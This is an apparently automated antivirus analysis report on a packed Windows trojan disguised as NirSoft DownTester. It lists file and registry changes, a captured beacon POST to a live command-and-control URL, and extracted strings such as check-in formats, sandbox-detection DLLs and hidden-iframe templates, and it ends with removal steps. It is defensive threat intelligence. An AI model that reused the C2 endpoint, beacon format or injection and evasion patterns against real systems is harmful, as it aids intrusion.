MD5: 36b45e5bfb2a8948516251a93752d081
SHA1: 53d77e6dbda8673080f0afbbc9b86cea4fc509d7
SHA256: e9b7f72295578608508ba8ae5df42f9b81f9b1f3139d9264e46d5fd00f286988
SSDeep: 3072:VwJ52Y7ZoH5XJacW4d1VCoiP5lIuKWc7UJYzxj8CSTn:VwHysrwiH4CYz3STn
Size: 110437 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-05-11 23:03:30
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2040

The Trojan injects its code into the following process(es):

%original file name%.exe:844

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:844 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\config\software (402 bytes)
%System%\config\SOFTWARE.LOG (1603 bytes)

The Trojan deletes the following file(s):

%WinDir%\306197153\ADService (0 bytes)

The process %original file name%.exe:2040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (2484 bytes)
%Documents and Settings%\%current user%\Application Data\gambesons.x (1568 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (0 bytes)

Registry activity

The process %original file name%.exe:844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 C7 D7 4B 39 B7 AB 20 CE 82 7B 0B 18 D7 B3 0F"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"*306197153"

The process %original file name%.exe:2040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 49 B8 A2 F0 51 8E 0A A9 9F DE B5 2D 4B 8F B1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: NirSoft
Product Name: DownTester
Product Version: 1.25.10.3
Legal Copyright: Copyright (c) 2009 - 2010 Nir Sofer
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.25.10.3
File Description: DownTester
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://23.228.100.130/~vpnmaste/panel/gate.php
hxxp://23.228.100.130:80/~vpnmaste/panel/gate.php

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

POST /~vpnmaste/panel/gate.php HTTP/1.1

Host: 23.228.100.130:80

Connection: close

Content-Type: application/x-www-form-urlencoded

Cache-Control: no-cache

Content-Length: 468

a=bW5raGlmY3pheHVyc3BldmR5dHFsZ2J3b2o6Z2RlYnl2d3Rxcm9saWphdXBtaHpmY3hza24=&b=vHR5wGU6x25vZXbfY3r1qWQ6MTE4YtA0YtA3NtQ1NDErMWUmYTcrYTbeODA2ZDYrNtI2OTZgvHBmqXY6YWRhqW58YXJnqDj4ODZ8Z2VoZDjeZXNlpG9svGNuwgVtOnF8x3M6V19YUHr2ZXI6pnEoMC44vG5fpDk0LnB8xgV3OnF8&c=ijggdddabbyyvvwtttqqnnol
HTTP/1.1 404 Not Found

Date: Thu, 15 Jan 2015 00:22:36 GMT

Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4

Accept-Ranges: bytes

Connection: close

Transfer-Encoding: chunked

Content-Type: text/html
1.....1.....95..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transi
tional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&
gt;.<html>.  <head>.    <title>..579..404 Not Found&
lt;/title>.    <meta http-equiv="Content-Type" content="text/htm
l; charset=utf-8" />.    <style type="text/css">.        body
 {.        .font-family: Verdana, Arial, Helvetica, sans-serif;.      
  .font-size: 12px;.        .background-color:#367E8E;.        .scroll
bar-base-color: #005B70;.        .scrollbar-arrow-color: #F3960B;.    
    .scrollbar-DarkShadow-Color: #000000;.        .color: #FFFFFF;....
margin:0;.        }.        a { color:#021f25; text-decoration:none}. 
       h1 {.        .font-size: 18px;.        .color: #FB9802;.       
 .padding-bottom: 10px;.        .background-image: url(sys_cpanel/imag
es/bottombody.jpg);.        .background-repeat: repeat-x;.        .pad
ding:5px 0 10px 15px;....margin:0;.        }.        #body-content p {
.        .padding-left: 25px;.        .padding-right: 25px;.        .l
ine-height: 18px;.        .padding-top: 5px;.        .padding-bottom: 
5px;.        }.        h2 {.        .font-size: 14px;.        .font-we
ight: bold;.        .color: #FF9900;.        .padding-left: 15px;.    
    }.    </style>.  </head>.  <body>.    <div id
="body-content">  .<!-- start content-->..<!-- . instead o
f REQUEST_URI, we could show absolute URL via:. hXXp://HTTP_HOST/REQUE
ST_URI.    but what if its hXXps:// or other protocol?.    .    SE
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

`:%.jN

tL<EtH<.tD

L1NISvhFIzXBFvDjm0Xx`qZ6F3igo78UuVaYeD3qwmYendPBGejPjmpV3ZBKxBE4ijl4ARmIGGfiGXhMky`5jYpnoLV3Q4AjVt2PH7StnaS9ktdpZPECFY0OtGzJ4fS6ipHfYOb-QKmkHFYoLWOmyRTGOyxbgzO051ltrsDm0UEMoc6XaKEyV`HuyIaapEUP7Pbg`e0fIS2t-GMTVoKbh8sbiANge3aP6ApyiZjVmk0WaGw-1iJ1aca-S-yjElZfQv6UNG`laNR0VW9CTQMFb67QCZXRkn4UZPO`ljg0b9tQKpGARH7XVKMgoZbA7RcBnuODMeslN1ZL9YFHw4pE`RYrPY82QEXL`e28Ub2KJVkbgTQDuN9mlKQLKGds6BbK0cu7u9miye8EGO-xRzlOO4hoXEvCxuZNjL-CrzM0OwvEeQIlK8cJTSeSEEKX5eyHlxFH3J`yzp2wlecWHj8lfNQXE50rHsXTewkyCsXNGImzuX73Q1TM1hARso-V-L`CwCkhvQhBIEFn2pD4F`eBRmkxM-zp6CyASbmuZNgSmYhIX6ci2xRurnTMC4bhfr4L0tHgaIoNU`tHoW6z4mVbtbQ4M8F4HixPQ`ZAxkPAvQMzC8OuAHDUg3GM606rSXXdinDU16GUeDMTVOpR2cZSO9-fTrWNcLCbsKys2pbuwyfmFWzlZ9dtLL03spzOK2Z90TuoLrU2fvi4xfRi2zy1au-gsTf-aZK6wwOyDHBZGLUtL9N`I5NQZqiiD4gQUoCbSbqFqZ2dRIrB7-gG5x63bMzxfgYfaD09MotFYCuAnyKLPwexl1tkpZ6InjxJhBC61oY9veVzmK79tswQiZKEuunwPR4O4ovdJXmZ-c8yFmD7KrqiZn8GXdGMb0KZVTzmMNaNSFwa4Cf4md7yrEZ8RQJ0yt237wIZQ6SxPJsz3i-cd0EpXcd9KNh2motDTNgK`U0yW0h3kbbG13BHNeXcVtfTBf4-`BMipo00SeeTAfUUrRhO8bCADM2gkHX76R8IPEfHn-ZWlw~~

uR2mlpMYv5W4VaWL9xsPDJQnbNe-RWVOw-eZPGEtf6dOEE5KjD0UeQfjZ3fi8qtGvtpJX3JZznnK7rIp3pidhaSa6f2`WMQlpSSldJf5nq3ICieMdKeqlc-uYmu7ZsiW3xNje09YsXIC0UzXFK1JRJ2Js-lbSCt72YHkB7kn4BhJdop2Y9zj4p93CqlTbT2WUwhjuv3NXc4nY3RweDpr4TcsKhjuLPkmbBedMY0uGavBaXr5mXRcmguEdW2wpN7hSl4zG3hlAfnFQypu5bcu9NTp-Yh`2AOOkz7ESmgINczE8xYbxufC54rtN2soEJ8mnDIVGyaHb2SN6kjo73dCh1dvznECtF0q2O3o4Ol`VhfPTIX9JfOsgoJY`-YNMIXrjpeNj54bwpTa8ztzieNgq17ilaVGQjfRAt6-RHefOjRSSsgNY0eDnmyoVRW3YJMAH7kewelPoyZMOyi9bJl4wIA-Z-sEz40GeoqekIVOU4b`KVujg3EAp6-R7hpalFlpmMhN9FgSgQtYLrTpdfp3ZQ54EsmglgmWHNyR2z5milwrVsWEfzituwQr75q7Ui2vqOHXZrgHH9mBs`sv8z57OUvwgKQIJq`1RCT0LJaQmbwf5m23hHwaL7cMi4c1vRupB9BzWeUfFQaEOPd6li-MDQGB9kCqaq`HP1CNi66hgvU6VM6IkjSozXTfNTvdPo`r`wq0rfKuKo8gb`SbpLluUsqIyCvxXBSQj9nHxJKoNR92UXl0BlO4UZyXDKbyD49fO2oTgXk22ku-KRTkI4FkQ45okEA5JVHbAi-qMDMsG1v9l5mvjBQxr14gbhZFzkHqTLoRZBG9c6Q5IqsoxVUun68-KfL4BVvZXKAThnMcyFno4VPu6TLKVVMdUef3-lXkQRrRirk`IqKVttxx7NYld793l17ASa0QyqhjvtTGofic8iY6W3u012yaOuINdZA9BQlj99icwj0s67y-rikCvm4PmbHKZCdI7kc92q2ftiDYbNHFFJXHNZqNPi6rSJZYKhyCiiJjna00xjA9l`747bWXqfZeVnxB24MdwxlCcIDvNWQFk7wXvME0t-Bej3NgnN0t1ugB19nUApQUQPdaemUviFhpllFjI0s~

libgcj-13.dll

Mozilla/4.0 (compatible)

%s--%s

%s\B%i.tmp

http.

hXXp://

hXXps://

%y%m%d

%s:%i

%s\browser%li.html

<meta http-equiv="refresh" content="%i">

%s "%s"

Software\Microsoft\Windows NT\CurrentVersion\Windows\load

%s\%s.exe

Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore

NoWindowsUpdate

%s@%s

%s\I%li.bat

%s\U%li.bat

%s\Google\Chrome\Application\chrome.exe

%s\Internet Explorer\iexplore.exe

%s\Opera\opera.exe

%s\Mozilla Firefox\firefox.exe

%s\Maxthon3\Bin\Maxthon.exe

Google Chrome

Opera

Firefox

chrome.exe

opera.exe

firefox.exe

iexplore.exe

Maxthon.exe

%s(%s)

|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:

|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

%s%s%i%s%s%s%s%s

%s:%s

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

|type:response|uid:%s|taskid:%i|return:%s|busy:%s|

autoruns.exe

explorer.exe

SbieDll.dll

snxhk.dll

dbghelp.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion

76487-640-1457236-23837

76487-644-3177037-23510

55274-640-2673064-23950

76497-640-6308873-23835

Windows Task Manager

%s %i %i

.hidden

filesearch.stop

%s@%s:%i

%s\System32\drivers\etc\protocol

%s\Microsoft.NET\Framework\

v4.0.30319

v2.0.50727

\explorer.exe

HTTP/1.

text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

application/x-www-form-urlencoded

HTTP/1.

dnsapi.dll

%s & %s

Software\Microsoft\Windows\CurrentVersion\

\Microsoft\Windows

%s%s%s%s%i%s%s

:Zone.Identifier

%s\K%li.bat

document.write(unescape('%s'));

<iframe src="%s" width="0" height="0" frameborder="0"></iframe>

operator

operator

global constructors keyed to

global destructors keyed to

operator""

VirtualQuery failed for %d bytes at address %p

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

fc_key

use_fc_key

hXXp://23.228.100.130/~vpnmaste/panel/gate.php

v1.0.8

~vpnmaste/panel/gate.php

23.228.100.130

%WinDir%

%Program Files%

%Documents and Settings%\All Users

%Documents and Settings%\%current user%

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Start Menu\Programs\Startup

%Documents and Settings%\All Users\Start Menu\Programs\Startup

%Program Files%\Internet Explorer\iexplore.exe

%Program Files%\Opera\opera.exe

%Program Files%\Mozilla Firefox\firefox.exe

%Program Files%\Maxthon3\Bin\Maxthon.exe

e.exe

ull)OaJTKCDfzKhXXp://23.228.100.130/~vpnmaste/panel/gate.php80buJEAmbGSSv1.0.8

306197153

c:\%original file name%.exe

%WinDir%\306197153

%WinDir%\306197153\ADService

NICK

JOIN

PRIVMSG

GetProcessHeap

RegCloseKey

RegCreateKeyExA

RegFlushKey

RegOpenKeyExA

ShellExecuteA

InternetOpenUrlA

.text

P`.data

.rdata

`@.eh_fram

[email protected]

.idata

VXa# %D

&%spie);

.kedD

.CRT 

KERNEL32.DLL

ADVAPI32.DLL

msvcrt.dll

SHELL32.DLL

USER32.dll

WININET.DLL

Okernel32.dll

advapi32.dll

Aicmp.dll

surlmon.dll

gws2_32.dll

rpcrt4.dll

%original file name%.exe_844_rwx_00400000_00087000:

`:%.jN

tL<EtH<.tD

L1NISvhFIzXBFvDjm0Xx`qZ6F3igo78UuVaYeD3qwmYendPBGejPjmpV3ZBKxBE4ijl4ARmIGGfiGXhMky`5jYpnoLV3Q4AjVt2PH7StnaS9ktdpZPECFY0OtGzJ4fS6ipHfYOb-QKmkHFYoLWOmyRTGOyxbgzO051ltrsDm0UEMoc6XaKEyV`HuyIaapEUP7Pbg`e0fIS2t-GMTVoKbh8sbiANge3aP6ApyiZjVmk0WaGw-1iJ1aca-S-yjElZfQv6UNG`laNR0VW9CTQMFb67QCZXRkn4UZPO`ljg0b9tQKpGARH7XVKMgoZbA7RcBnuODMeslN1ZL9YFHw4pE`RYrPY82QEXL`e28Ub2KJVkbgTQDuN9mlKQLKGds6BbK0cu7u9miye8EGO-xRzlOO4hoXEvCxuZNjL-CrzM0OwvEeQIlK8cJTSeSEEKX5eyHlxFH3J`yzp2wlecWHj8lfNQXE50rHsXTewkyCsXNGImzuX73Q1TM1hARso-V-L`CwCkhvQhBIEFn2pD4F`eBRmkxM-zp6CyASbmuZNgSmYhIX6ci2xRurnTMC4bhfr4L0tHgaIoNU`tHoW6z4mVbtbQ4M8F4HixPQ`ZAxkPAvQMzC8OuAHDUg3GM606rSXXdinDU16GUeDMTVOpR2cZSO9-fTrWNcLCbsKys2pbuwyfmFWzlZ9dtLL03spzOK2Z90TuoLrU2fvi4xfRi2zy1au-gsTf-aZK6wwOyDHBZGLUtL9N`I5NQZqiiD4gQUoCbSbqFqZ2dRIrB7-gG5x63bMzxfgYfaD09MotFYCuAnyKLPwexl1tkpZ6InjxJhBC61oY9veVzmK79tswQiZKEuunwPR4O4ovdJXmZ-c8yFmD7KrqiZn8GXdGMb0KZVTzmMNaNSFwa4Cf4md7yrEZ8RQJ0yt237wIZQ6SxPJsz3i-cd0EpXcd9KNh2motDTNgK`U0yW0h3kbbG13BHNeXcVtfTBf4-`BMipo00SeeTAfUUrRhO8bCADM2gkHX76R8IPEfHn-ZWlw~~

uR2mlpMYv5W4VaWL9xsPDJQnbNe-RWVOw-eZPGEtf6dOEE5KjD0UeQfjZ3fi8qtGvtpJX3JZznnK7rIp3pidhaSa6f2`WMQlpSSldJf5nq3ICieMdKeqlc-uYmu7ZsiW3xNje09YsXIC0UzXFK1JRJ2Js-lbSCt72YHkB7kn4BhJdop2Y9zj4p93CqlTbT2WUwhjuv3NXc4nY3RweDpr4TcsKhjuLPkmbBedMY0uGavBaXr5mXRcmguEdW2wpN7hSl4zG3hlAfnFQypu5bcu9NTp-Yh`2AOOkz7ESmgINczE8xYbxufC54rtN2soEJ8mnDIVGyaHb2SN6kjo73dCh1dvznECtF0q2O3o4Ol`VhfPTIX9JfOsgoJY`-YNMIXrjpeNj54bwpTa8ztzieNgq17ilaVGQjfRAt6-RHefOjRSSsgNY0eDnmyoVRW3YJMAH7kewelPoyZMOyi9bJl4wIA-Z-sEz40GeoqekIVOU4b`KVujg3EAp6-R7hpalFlpmMhN9FgSgQtYLrTpdfp3ZQ54EsmglgmWHNyR2z5milwrVsWEfzituwQr75q7Ui2vqOHXZrgHH9mBs`sv8z57OUvwgKQIJq`1RCT0LJaQmbwf5m23hHwaL7cMi4c1vRupB9BzWeUfFQaEOPd6li-MDQGB9kCqaq`HP1CNi66hgvU6VM6IkjSozXTfNTvdPo`r`wq0rfKuKo8gb`SbpLluUsqIyCvxXBSQj9nHxJKoNR92UXl0BlO4UZyXDKbyD49fO2oTgXk22ku-KRTkI4FkQ45okEA5JVHbAi-qMDMsG1v9l5mvjBQxr14gbhZFzkHqTLoRZBG9c6Q5IqsoxVUun68-KfL4BVvZXKAThnMcyFno4VPu6TLKVVMdUef3-lXkQRrRirk`IqKVttxx7NYld793l17ASa0QyqhjvtTGofic8iY6W3u012yaOuINdZA9BQlj99icwj0s67y-rikCvm4PmbHKZCdI7kc92q2ftiDYbNHFFJXHNZqNPi6rSJZYKhyCiiJjna00xjA9l`747bWXqfZeVnxB24MdwxlCcIDvNWQFk7wXvME0t-Bej3NgnN0t1ugB19nUApQUQPdaemUviFhpllFjI0s~

libgcj-13.dll

Mozilla/4.0 (compatible)

%s--%s

%s\B%i.tmp

http.

hXXp://

hXXps://

%y%m%d

%s:%i

%s\browser%li.html

<meta http-equiv="refresh" content="%i">

%s "%s"

Software\Microsoft\Windows NT\CurrentVersion\Windows\load

%s\%s.exe

Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore

NoWindowsUpdate

%s@%s

%s\I%li.bat

%s\U%li.bat

%s\Google\Chrome\Application\chrome.exe

%s\Internet Explorer\iexplore.exe

%s\Opera\opera.exe

%s\Mozilla Firefox\firefox.exe

%s\Maxthon3\Bin\Maxthon.exe

Google Chrome

Opera

Firefox

chrome.exe

opera.exe

firefox.exe

iexplore.exe

Maxthon.exe

%s(%s)

|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:

|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|

%s%s%i%s%s%s%s%s

%s:%s

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

|type:response|uid:%s|taskid:%i|return:%s|busy:%s|

autoruns.exe

explorer.exe

SbieDll.dll

snxhk.dll

dbghelp.dll

SOFTWARE\Microsoft\Windows NT\CurrentVersion

76487-640-1457236-23837

76487-644-3177037-23510

55274-640-2673064-23950

76497-640-6308873-23835

Windows Task Manager

%s %i %i

.hidden

filesearch.stop

%s@%s:%i

%s\System32\drivers\etc\protocol

%s\Microsoft.NET\Framework\

v4.0.30319

v2.0.50727

\explorer.exe

HTTP/1.

text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1

application/x-www-form-urlencoded

HTTP/1.

dnsapi.dll

%s & %s

Software\Microsoft\Windows\CurrentVersion\

\Microsoft\Windows

%s%s%s%s%i%s%s

:Zone.Identifier

%s\K%li.bat

document.write(unescape('%s'));

<iframe src="%s" width="0" height="0" frameborder="0"></iframe>

operator

operator

global constructors keyed to

global destructors keyed to

operator""

VirtualQuery failed for %d bytes at address %p

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

fc_key

use_fc_key

hXXp://23.228.100.130/~vpnmaste/panel/gate.php

v1.0.8

~vpnmaste/panel/gate.php

23.228.100.130

%WinDir%

%Program Files%

%Documents and Settings%\All Users

%Documents and Settings%\%current user%

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Start Menu\Programs\Startup

%Documents and Settings%\All Users\Start Menu\Programs\Startup

%Program Files%\Internet Explorer\iexplore.exe

%Program Files%\Opera\opera.exe

%Program Files%\Mozilla Firefox\firefox.exe

%Program Files%\Maxthon3\Bin\Maxthon.exe

e.exe

ull)OaJTKCDfzKhXXp://23.228.100.130/~vpnmaste/panel/gate.php80buJEAmbGSSv1.0.8

306197153

c:\%original file name%.exe

%WinDir%\306197153

%WinDir%\306197153\ADService

NICK

JOIN

PRIVMSG

GetProcessHeap

RegCloseKey

RegCreateKeyExA

RegFlushKey

RegOpenKeyExA

ShellExecuteA

InternetOpenUrlA

.text

P`.data

.rdata

`@.eh_fram

[email protected]

.idata

VXa# %D

&%spie);

.kedD

.CRT 

KERNEL32.DLL

ADVAPI32.DLL

msvcrt.dll

SHELL32.DLL

USER32.dll

WININET.DLL

Okernel32.dll

advapi32.dll

Aicmp.dll

surlmon.dll

gws2_32.dll

rpcrt4.dll

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:2040

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %System%\config\software (402 bytes)
   %System%\config\SOFTWARE.LOG (1603 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp\concierges.dll (2484 bytes)
   %Documents and Settings%\%current user%\Application Data\gambesons.x (1568 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.